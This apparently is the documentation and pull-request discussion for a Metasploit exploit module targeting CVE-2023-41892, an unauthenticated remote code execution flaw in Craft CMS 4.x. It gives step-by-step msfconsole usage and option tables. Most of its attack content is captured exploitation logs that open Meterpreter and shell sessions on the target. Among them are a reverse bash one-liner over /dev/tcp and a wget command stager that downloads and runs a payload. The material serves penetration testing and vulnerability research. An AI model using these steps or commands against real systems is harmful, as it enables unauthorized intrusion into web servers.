Craft CMS unauthenticed RCE [CVE-2023-41892]

[h00die-gr3y]

This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in CraftCMS which is a popular content management system. CraftCMS versions between 4.0.0-RC1 - 4.4.14 are affected by this vulnerability allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.

The vulnerability occurs using a PHP object creation in the \craft\controllers\ConditionsController class which allows to run arbitrary PHP code by escalating the object creation calling some methods available in \GuzzleHttp\Psr7\FnStream.
Using this vulnerability in combination with The Imagick Extension and MSL which stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that facilitates the reading of images, performance of image processing tasks, and writing of results back to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using the Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the malicious PHP code and gaining access to the system.
For more information, please check this article on attackerkb.com.

Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain access to the underlying operating system as the user that the web services are running as (typically www-data).

Installation

To test this module, you will need a vulnerable CraftCMS application.

This module has been tested on:

• CraftCMS 4.4.14 running on MacOS Docker Desktop based on a DDEV deployment.

Installation steps to install CraftCMS on MacOS using Desktop Docker and DDEV

• Install Docker Desktop on your MacOS distribution.

• Install DDEV.

• Install CraftCMS following these installation steps.

• NOTE: After step 2 Scaffold the project from the official starter project, open composer.json to edit the CraftCMS version and set it to 4.4.14 or lower.

• Run composer update to downgrade the CraftCMS version to a vulnerable version. See also these instructions.

• Continue with step 3 and after completion, you should be able to access your application using your site name (https://mysite.ddev.site)

• To access your application from another host, you need to setup a tunnel otherwise you can only access it from the local machine. You can follow these instructions.

You are now ready to test the module.

Verification Steps

• Start msfconsole
• use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
• set rhosts <ip-target>
• set rport 443
• set lhost <ip-attacker>
• set target <0=php, 1=Unix Command, 2=Linux Dropper>
• exploit

you should get a shell or Meterpreter

msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > info

       Name: Craft CMS unauthenticated Remote Code Execution (RCE)
     Module: exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
   Platform: Unix, Linux, PHP
       Arch: cmd, php, x64, x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2023-09-13

Provided by:
  chybeta
  h00die-gr3y <h00die.gr3y@gmail.com>

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
                                        ml
  RPORT      443              yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Craft CMS base url
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host
  WEBSHELL                    no        The name of the webshell with extension .php. Webshell name will be randomly generated if left unset
                                        

  When TARGET is not 0:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.
                                      0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular
  content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are  affected by this vulnerability
  allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity
  of the application.

  The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class
  which allows to run arbitary PHP code by escalating the object creation calling some methods available in
  `\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which
  stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that
  facilitates the reading of images, performance of image processing tasks, and writing of results back
  to the filesystem. This can be leveraged to create a dummy image containing mailcious PHP code using the
  Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the
  malicious PHP code and gaining access to the system.

  Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain
  access to the underlying operating system as the user that the web services are running as (typically www-data).

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-41892
  https://blog.calif.io/p/craftcms-rce
  https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
  https://github.com/advisories/GHSA-4w8r-3xrw-v25g
  https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892


View the full module info with the info -d command.

Options

WEBSHELL

You can use this option to set the filename of the webshell with extension .php, otherwise the name will be randomly generated.

COMMAND

This option provides the user to choose the PHP underlying shell command function to be used for execution.
The choices are system(), passthru(), shell_exec() and exec() and it defaults to passthru().
This option is only available when the target selected is either Unix Command or Linux Dropper.
For the native PHP target, by default the eval() function will be used for native PHP code execution.

Scenarios

CraftCMS 4.4.14 on MacOS PHP - php/meterpreter/reverse_tcp

msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.25
[+] Deleted /var/www/html/web/CDfbvAnrZMH.php
[+] Deleted /tmp/php5M63PK
[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.25:51044) at 2023-12-17 12:31:55 +0000

meterpreter > sysinfo
Computer    : craftcms-vuln-web
OS          : Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter >

CraftCMS 4.4.14 on MacOS Unix Command - cmd/unix/reverse_bash

msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 1
target => 1
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted /var/www/html/web/XGCuZFdoia.php
[+] Deleted /tmp/phpakTlmu
[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.25:51101) at 2023-12-17 12:34:34 +0000

uname -a
Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64 GNU/Linux
id
uid=501(www-data) gid=20(dialout) groups=20(dialout)

CraftCMS 4.4.14 on MacOS Linux Dropper - linux/x64/meterpreter/reverse_tcp

msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 2
target => 2
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/bzzA52uoIqWP
[*] Client 192.168.201.25 (Wget/1.21) requested /bzzA52uoIqWP
[*] Sending payload to 192.168.201.25 (Wget/1.21)
[*] Sending stage (3045380 bytes) to 192.168.201.25
[+] Deleted /var/www/html/web/sFQEhvKKcl.php
[+] Deleted /tmp/phpeQPKpy
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.25:51122) at 2023-12-17 12:35:54 +0000
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.16.2
OS           : Debian 11.8 (Linux 6.4.16-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >

Limitations

Part of the exploit is the MSL script creation triggered by the Imagick plugin module. These files are created in the directory set by the upload_tmp_dir setting in the php.ini file (default /tmp). These files are automatically cleaned, but in case of any failure, do clean them manually otherwise the next exploit session will fail using an outdated MSL file. These files start with php and you can list them with the command ls php*.

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[cdelafuente-r7]

Thanks @h00die-gr3y for updating this. I just left a few last comments and questions before it lands. I tested against CraftCMS version 4.4.14 and it works great.

[cdelafuente-r7]

Thanks for updating this @h00die-gr3y ! Everything looks good to me now. I tested against CraftCMS version 4.4.14 and verified I got a session with all the targets. I'll go ahead and land it.

• Example output:

msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > run verbose=true rhosts=craftcms.ddev.site lhost=192.168.100.129

[*] Started reverse TCP handler on 192.168.100.129:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 172.20.0.2
[+] Deleted /var/www/html/web/vfqJzrPPq.php
[+] Deleted /tmp/phpdZCfDw
[*] Meterpreter session 1 opened (192.168.100.129:4444 -> 172.20.0.2:34108) at 2023-12-22 04:54:49 -0500

meterpreter > getuid 
Server username: n00tmeg
meterpreter > sysinfo 
Computer    : craftcms-web
OS          : Linux craftcms-web 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) x86_64
Meterpreter : php/linux
meterpreter > [*] Shutting down session: 1

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 1
target => 1
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > run verbose=true rhosts=craftcms.ddev.site lhost=192.168.100.129

[+] bash -c '0<&191-;exec 191<>/dev/tcp/192.168.100.129/4444;sh <&191 >&191 2>&191'
[*] Started reverse TCP handler on 192.168.100.129:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted /var/www/html/web/yWjfqZIRZ.php
[+] Deleted /tmp/phpz2qfRv
[*] Command shell session 2 opened (192.168.100.129:4444 -> 172.20.0.2:45476) at 2023-12-22 04:55:49 -0500

uname -a
Linux craftcms-web 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) x86_64 GNU/Linux
id
uid=1001(n00tmeg) gid=1001(n00tmeg) groups=1001(n00tmeg)
exit
[*] 127.0.0.1 - Command shell session 2 closed.
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 2
target => 2
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > run verbose=true rhosts=craftcms.ddev.site lhost=192.168.100.129

[*] Started reverse TCP handler on 192.168.100.129:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.100.129:8080/iYfmJKdF
[*] Generated command stager: ["wget -qO /tmp/vgoJzHOh http://192.168.100.129:8080/iYfmJKdF;chmod +x /tmp/vgoJzHOh;/tmp/vgoJzHOh;rm -f /tmp/vgoJzHOh"]
[*] Client 172.20.0.2 (Wget/1.21) requested /iYfmJKdF
[*] Sending payload to 172.20.0.2 (Wget/1.21)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.20.0.2
[+] Deleted /var/www/html/web/fdxQfMeBfFMN.php
[+] Deleted /tmp/phpS7nwHB
[*] Meterpreter session 3 opened (192.168.100.129:4444 -> 172.20.0.2:53312) at 2023-12-22 04:56:23 -0500
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.

meterpreter > getuid 
Server username: n00tmeg
meterpreter > sysinfo 
Computer     : 172.20.0.2
OS           : Debian 11.8 (Linux 6.5.0-kali3-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

[cdelafuente-r7]

Release notes

This adds an exploit module that leverages a remote code execution vulnerability in CraftCMS versions between 4.0.0-RC1 and 4.4.14. This vulnerability is identified as CVE-2023-41892 and allows an unauthenticated attacker to execute arbitrary code remotely.